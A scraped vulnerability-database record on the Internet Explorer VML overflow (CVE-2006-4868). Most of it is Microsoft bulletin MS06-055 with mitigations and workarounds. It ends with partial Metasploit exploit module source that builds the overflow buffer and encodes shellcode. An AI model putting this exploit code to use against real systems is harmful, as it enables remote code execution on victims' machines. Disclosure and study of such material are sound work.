Updated: ** | 2007-03-21 20:22 UTC \n**Document Revision: ** | 72 \n", "modified": "2007-03-21T20:22:00", "published": "2006-09-19T00:00:00", "id": "VU:416092", "href": "https://www.kb.cert.org/vuls/id/416092", "type": "cert", "title": "Microsoft Internet Explorer VML stack buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS06-055\r\nVulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)\r\nPublished: September 26, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\u2022\t\r\n\r\nInternet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 \u2014 Download the 
update\r\n\u2022\t\r\n\r\nInternet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a public vulnerability as well as additional issues discovered through internal investigations. The vulnerability is documented in the "Vulnerability Details" section of this bulletin.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000 Service Pack 4\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nVML Buffer Overrun Vulnerability - CVE-2006-4868\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nModerate\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. 
See the FAQ section for this security update for more information about Internet Explorer Enhanced Security Configuration.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating system versions as follows:\r\n\u2022\t\r\n\r\nThe Windows XP Professional x64 Edition severity rating is the same as the Windows XP Service Pack 2 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nCan I deploy this security update after I have applied the workarounds provided in Microsoft Security Advisory 925568?\r\nIf the workaround "Modify the Access Control List on Vgx.dll to be more restrictive" has been applied to systems, the security updates provided with this security bulletin may not install correctly. See the Workarounds for VML Buffer Overrun Vulnerability - CVE-2006-4868 section in this security bulletin for instructions on how to revert this workaround before applying this security update.\r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security update. 
The security bulletin ID and affected operating systems are listed in the following table.\r\nBulletin ID\tWindows 2000 Service Pack 4\tWindows 2000 Service Pack 4 with Internet Explorer 6 Service Pack 1 Installed\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\n\r\nMS04-028\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nReplaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nNot Replaced\r\n\r\nWhy are the security updates for Windows XP Service Pack 1 and Windows 2000 Service Pack 4 labeled as Internet Explorer Updates?\r\nWhile this is a security update for Windows, the files are serviced from the Internet Explorer code base on these platforms. As such, it follows Internet Explorer standards for packaging as well as detection and deployment.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running specially crafted Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. 
This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nThe Internet Explorer Enhanced Security Configuration does not provide mitigation for applications like Microsoft Outlook which can be installed on Windows Server 2003.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. 
For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tEnterprise Scanning Tool (EST)\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, 
visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nWhat is the Enterprise Update Scan Tool (EST)?\r\nAs part of an ongoing commitment to provide detection tools for bulletin-class security updates, Microsoft delivers a stand-alone detection tool whenever the Microsoft Baseline Security Analyzer (MBSA) and the Office Detection Tool (ODT) cannot detect whether the update is required for an MSRC release cycle. This stand-alone tool is called the Enterprise Update Scan Tool (EST) and is designed for enterprise administrators. When a version of the Enterprise Update Scan Tool is created for a specific bulletin, customers can run the tool from a command line interface (CLI) and view the results of the XML output file. To help customers better utilize the tool, detailed documentation will be provided with the tool. There is also a version of the tool that offers an integrated experience for SMS administrators.\r\n\r\nCan I use a version of the Enterprise Update Scan Tool (EST) to determine whether this update is required?\r\nYes. Microsoft has created a version of the EST that will determine if you have to apply this update. For download links and more information about the version of the EST that is being released this month, see the following Microsoft Web site. SMS customers should review the "Can I use Systems Management Server (SMS) to determine whether this update is required?" 
FAQ for more information about SMS and EST.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes (With EST)\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 x64 Edition family\r\n\t\r\n\r\nNo\r\n\t\r\n\r\nYes\r\n\r\nSMS 2.0 and SMS 2003 Software Update Services (SUS) Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool (SUIT), can be used by SMS to detect security updates. SMS SUIT uses the MBSA 1.2.1 engine for detection. For more information about SUIT, visit the following Microsoft Web site. For more information about the limitations of SUIT, see Microsoft Knowledge Base Article 306460. The SMS SUS Feature Pack also includes the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. 
For more information about the SMS 2003 ITMU, visit the following Microsoft Web site. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nVML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nA remote code execution vulnerability exists in the Vector Markup Language (VML) implementation in Microsoft Windows. An attacker could exploit the vulnerability by constructing a specially crafted Web page or HTML e-mail that could potentially allow remote code execution if a user visited the Web page or viewed the message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\t\r\nMitigating Factors for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\u2022\t\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail in plain text are at less risk from this vulnerability. 
Instead users would have to either click on a link that would take them to a malicious Web site or open an attachment to be at risk from this vulnerability.\r\n\u2022\t\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail using Outlook Express on Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, are at less risk from this vulnerability because Binary and Script Behaviors is disabled by default in the Restricted sites zone.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability in Windows Server 2003 Service Pack 1 because Binary and Script Behaviors is disabled by default in the Internet zone.\r\n\u2022\t\r\n\r\nBy default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability in the e-mail vector for Outlook Express because reading e-mail messages in plain text is the default configuration. See the FAQ section of this security update for more information about Internet Explorer Enhanced Security Configuration.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nUnregister VGX.DLL\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nA dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\nImpact of Workaround: Applications that render VML will no longer do so once vgx.dll has been unregistered.\r\n\r\nThis security update does not automatically re-register vgx.dll so any applications that render VML will no longer do so until vgx.dll has been re-registered. To re-register vgx.dll follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "%SystemRoot%\System32\regsvr32.exe" "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll", and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nA dialog box appears to confirm that the registration process has succeeded. 
Click OK to close the dialog box.\r\n\u2022\t\r\n\r\nModify the Access Control List on VGX.DLL to be more restrictive\r\n\r\nApplying this workaround may cause the installation of the security updates provided with this security bulletin to fail; revert it before installing (see below).\r\n\r\nTo modify the Access Control List (ACL) on vgx.dll to be more restrictive, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "cmd" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nType the following command at a command prompt to make a note of the current ACLs on the file (including inheritance settings), so that this modification can be undone later:\r\n\r\ncacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll"\r\n\r\n3.\r\n\t\r\n\r\nType the following command at a command prompt to deny the 'everyone' group access to this file:\r\n\r\necho y| cacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll" /d everyone\r\n\r\n4.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\r\nImpact of Workaround: Applications and Web sites that render VML may no longer display or function correctly.\r\n\r\nBefore this security update can be installed, this workaround must be reverted to the previous ACL configuration for vgx.dll. 
To revert to the previous vgx.dll ACL\u2019s follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "cmd" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nTo revert to the previous ACL configuration for vgx.dll, type the following command and replace previous with the ACL\u2019s recorded in step 2 of this workaround:\r\n\r\necho y| cacls "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll" /g previous\r\n\r\n3.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\u2022\t\r\n\r\nConfigure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your settings to disable binary and script behaviors in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Internet Options on the Tools menu.\r\n\r\n2.\r\n\t\r\n\r\nClick the Security tab.\r\n\r\n3.\r\n\t\r\n\r\nClick Internet, and then click Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Binary and Script Behaviors, click Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Binary and Script Behaviors, click Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: Disabling binary and script behaviors in the Internet and Local intranet security zones may cause some Web sites that rely on VML to not function correctly.\r\n\u2022\t\r\n\r\nRead e-mail messages in plain text format if you are using Outlook 2002 or a later version, or Outlook Express 6 SP1 or a later version, to help protect yourself from the HTML e-mail attack vector\r\n\r\nMicrosoft 
Outlook 2002 users who have applied Office XP Service Pack 1 or a later version and Microsoft Outlook Express 6 users who have applied Internet Explorer 6 Service Pack 1 or a later version can enable this setting and view e-mail messages that are not digitally signed or e-mail messages that are not encrypted in plain text only.\r\n\r\nDigitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.\r\n\r\nFor information about this setting in Outlook Express 6, see Microsoft Knowledge Base Article 291387.\r\n\r\nImpact of Workaround: E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content. Additionally:\r\n\u2022\t\r\n\r\nThe changes are applied to the preview pane and to open messages.\r\n\u2022\t\r\n\r\nPictures become attachments so that they are not lost.\r\n\u2022\t\r\n\r\nBecause the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.\r\n\u2022\t\r\n\r\nBlock VML Vulnerability Traffic with ISA Server\r\n\r\nCustomers with Microsoft Internet Security and Acceleration (ISA) Server 2004 or 2006 may also block malicious traffic intended to exploit this vulnerability. For more information about how to enable this setting in ISA Server, see Learn How Your ISA Server Helps Block VML Vulnerability Traffic.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for VML Buffer Overrun Vulnerability - CVE-2006-4868:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability in the Vector Markup Language (VML) implementation in Microsoft Windows. 
An attacker could exploit the vulnerability by constructing a specially crafted Web page or HTML e-mail that could potentially allow remote code execution if a user visited the Web page or viewed the message.\r\n\r\nIf a user were logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the VML implementation in Microsoft Windows.\r\n\r\nWhat is VML?\r\nVector Markup Language (VML) is an XML-based exchange, editing, and delivery format for high-quality vector graphics on the Web that meets the needs of both productivity users and graphic design professionals. XML is a simple, flexible, and open text-based language that complements HTML. For more information on the VML, see the product documentation.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. 
Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.\r\n\r\nIn an e-mail based attack of this exploit, customers who read e-mail in plain text are at less risk from this vulnerability. Instead users would have to either click on a link that would take them to a malicious Web site or open an attachment to be at risk from this vulnerability.\r\n\r\nCustomers who read e-mail in plain text would also be at less risk when using the Outlook or Outlook Express preview panes.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nThis vulnerability requires that a user is logged on and reading e-mail messages or is visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability. Systems that are not typically used to visit Web sites, such as most server systems, are at a reduced risk.\r\n\r\nWhat is the Internet Explorer Enhanced Security Configuration?\r\nInternet Explorer Enhanced Security Configuration is a group of preconfigured Internet Explorer settings that reduce the likelihood of a user or of an administrator downloading and running specially crafted Web content on a server. Internet Explorer Enhanced Security Configuration reduces this risk by modifying many security-related settings. This includes the settings on the Security tab and the Advanced tab in the Internet Options dialog box. Some of the important modifications include the following:\r\n\u2022\t\r\n\r\nSecurity level for the Internet zone is set to High. This setting disables scripts, ActiveX controls, Microsoft Java Virtual Machine (MSJVM), and file downloads.\r\n\u2022\t\r\n\r\nAutomatic detection of intranet sites is disabled. 
This setting assigns all intranet Web sites and all Universal Naming Convention (UNC) paths that are not explicitly listed in the Local intranet zone to the Internet zone.\r\n\u2022\t\r\n\r\nInstall On Demand and non-Microsoft browser extensions are disabled. This setting prevents Web pages from automatically installing components and prevents non-Microsoft extensions from running.\r\n\u2022\t\r\n\r\nMultimedia content is disabled. This setting prevents music, animations, and video clips from running.\r\n\r\nFor more information regarding Internet Explorer Enhanced Security Configuration, see the guide, Managing Internet Explorer Enhanced Security Configuration, at the following Web site.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that Windows validates the length of data before storing it in the allocated buffer.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2006-4868.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is currently being exploited. 
The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2006-4868.\r\n\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nISS X-Force for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\u2022\t\r\n\r\niDEFENSE for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\u2022\t\r\n\r\nDan Hubbard at Websense Security Labs for working with Microsoft on the VML Buffer Overrun Vulnerability (CVE-2006-4868).\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 (September 26, 2006): Bulletin published.", "modified": "2006-09-27T00:00:00", "published": "2006-09-27T00:00:00", "id": "SECURITYVULNS:DOC:14434", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14434", "title": "Microsoft Security Bulletin MS06-055 Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:36", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83194/Internet-Explorer-VML-Fill-Method-Code-Execution.html", "id": "PACKETSTORM:83194", "type": "packetstorm", "title": "Internet Explorer VML Fill Method Code Execution", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Internet Explorer VML Fill Method Code Execution', \n'Description' => %q{ \nThis module exploits a code execution vulnerability in Microsoft Internet Explorer using \na buffer overflow in the VML processing code (VGX.dll). This module has been tested on \nWindows 2000 SP4, Windows XP SP0, and Windows XP SP2. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'hdm', \n'Aviv Raff <avivra [at] gmail.com>', \n'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', \n'Mr.Niega <Mr.Niega [at] gmail.com>', \n'M. Shirk <shirkdog_list [at] hotmail.com>' \n], \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-4868' ], \n['OSVDB', '28946' ], \n['MSB', 'MS06-055' ], \n['BID', '20096' ], \n], \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ] \n], \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \n \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Determine the buffer length to use \nbuflen = 1024 \nif (request.headers['User-Agent'] =~ /Windows 5\\.[123]/) \nbuflen = 65535 \nend \n \n# Encode the shellcode \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Get a unicode friendly version of the return address \naddr_word = [target.ret].pack('V').unpack('H*')[0][0,4] \n \n# Select a random VML element to use \nvmls = %w{ rect roundrect line polyline oval image arc curve } \nvmlelem = vmls[ rand(vmls.length) ] \n \n# The overflow buffer for the method attribute \nbuffer = (\"&#x\" + addr_word + \";\") * buflen \n \n# Generate a random XML namespace for VML \nxmlns = rand_text_alpha(rand(30)+2) \n \n# Randomize the javascript variable names \nvar_buffer = rand_text_alpha(rand(30)+2) \nvar_shellcode = rand_text_alpha(rand(30)+2) \nvar_unescape = rand_text_alpha(rand(30)+2) \nvar_x = rand_text_alpha(rand(30)+2) \nvar_i = rand_text_alpha(rand(30)+2) \n \n# Build out the message \ncontent = %Q| \n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" > \n<head> \n<style> #{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style> \n<body> \n<script> \n \nvar #{var_unescape} = unescape ; \nvar #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ; \n 
